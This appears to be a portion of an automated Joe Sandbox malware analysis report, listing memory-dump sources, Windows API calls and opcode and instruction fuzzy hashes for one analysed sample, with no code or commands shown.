                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction ID: 209f946d11be42c98d961b3d0525baeb6e7168c7d36b0012abed9deaa24f1eea
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 233242B0601B469FDB48CF26D580389BBB1FF45300F5486A8C9695FB5ADB35A892CFC0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                          • API String ID: 0-119712241
                                                                                                                                                                                                                                                                          • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                          • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                                          • API String ID: 0-2430453506
                                                                                                                                                                                                                                                                          • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                          • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction ID: 12611c0b4a176b7151f444d1137104aa69985d78de6bf22a88dd7092bad47809
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06B1E67010C3818AE368CF29C4917ABBFD2EFD2304F288AADD4D98B2D1DB748549D756
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$0$5$D@6T$EF$zJyL
• API String ID: 0-3264166258
• Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
• Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
APIs
• GetCurrentProcessId.KERNEL32 ref: 00AE8A1B
• GetCurrentThreadId.KERNEL32 ref: 00AE8A25
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00AE8AC2
• GetForegroundWindow.USER32 ref: 00AE8AD7
• ExitProcess.KERNEL32 ref: 00AE8BD9
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 4063528623-0
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: 5f86f26a9c8b2924393a5290358a5fb616db895037bc318f17344b9791255d8e
• Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction Fuzzy Hash: 24417E77F4431807D71CAEB58C9A3AEB6D69BC4314F0A803E6985AB390DD7D5C0552C1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: )*$X9{;$r1B
• API String ID: 0-1001561910
• Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
• Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
• Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
• Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: -$C\$Iz$[^$de
• API String ID: 0-3020956940
• Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
• Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
• Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
• Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: &'$0c=e$2g1i$<k;m$wy
• API String ID: 0-3335612808
• Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
• Instruction ID: 8b484252c68323650f17082b747cc0c325edaf5dd513adc908146495f9859f88
• Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
• Instruction Fuzzy Hash: 04D108B56183018BD724DF25C85276BBBF2EFA2314F189A6CE4828B394F7799801C752
Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
• Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
• Instruction ID: 609999984bc9c998e792b9c0a6681b290f728827b7030e3e4f8b4e4a923cf430
• Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
• Instruction Fuzzy Hash: 98A1E87110C3818BE368CF2984917ABBFD2EFD2314F289AADD4D98B2D1DB748449C756
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
• Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
• Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
• Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
• Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
• Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
• Instruction ID: 71f30160ed923e9dd3d401b587b1b5701c6a2abb8fb68add29ff13792d337fd1
• Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
• Instruction Fuzzy Hash: 0DA1E77010C3818BE364CF2984917ABBFD2EBD2304F289AADD4D98B2D1DB748549C756
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction ID: 471ea1c30f5aa69f8a04c4466285c50d64c0d3b65cd13037b4dd15924b54c977
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50A1D47110C3818AE364CF2984917ABBFD2EFE2304F289AADD4D98B2D1DB748449C756
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                          • API String ID: 0-979945983
                                                                                                                                                                                                                                                                          • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                          • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                          • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                          • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                          • Instruction ID: 9a7c73028d07bd3d907d43231084d0923f84785a222f15315389b8d4642b7410
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8442277050C3948FC725DF68C85067EBBE1AF92314F08866DF9E59B3A2D7368905C792
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                          • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                          • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                          • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: %(#}$/$/26-$1
• API String ID: 0-261129489
• Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
• Instruction ID: 9248be859a9a08d1b426f4d938abec322d68a6d09ec1d26ce162d1f0d308fdc5
• Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
• Instruction Fuzzy Hash: 32E1D57111D3C18BE765CF29C491BBABFD6EF92304F1889ADD0D987292DB39850AC712
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: %(#}$/$/26-$1
• API String ID: 0-261129489
• Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
• Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
• Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
• Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: %(#}$/$/26-$1
• API String ID: 0-261129489
• Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
• Instruction ID: 398dfe8dda49fb3b5fb37800eaea31f98596259c21def15db7045e355c558621
• Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
• Instruction Fuzzy Hash: D3E1B27151C3C18AE775CF298460BBABFD6EFD2304F1888ADC1C987292DB39454ACB12
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: %(#}$/$/26-$1
• API String ID: 0-261129489
• Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
• Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: "w+y$?TUV$D@YO$^QRW
• API String ID: 0-2418547040
• Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
• Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
• Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
• Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
• Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
• Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
• Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
• Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: BI$ZG$3ej$pr
• API String ID: 0-483502859
• Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction ID: 9635682069ee79f206f4013d95d7a47751280732f6dbfeae21b82abebed8c0c9
• Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction Fuzzy Hash: EBA1A3B52417818FD728CF2AC590A62BBF2FF96304B1995ADC4D68F766D734E802CB10
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: BI$ZG$3ej$pr
• API String ID: 0-483502859
• Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
• Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                                          • API String ID: 0-2543814982
                                                                                                                                                                                                                                                                          • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                          • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
